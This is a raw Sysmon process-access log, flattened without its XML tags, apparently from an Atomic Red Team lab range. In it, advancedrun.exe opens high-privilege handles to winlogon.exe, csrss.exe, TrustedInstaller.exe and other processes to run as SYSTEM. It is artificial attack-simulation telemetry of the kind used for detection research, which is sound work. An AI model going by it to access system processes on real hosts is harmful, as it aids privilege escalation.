17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 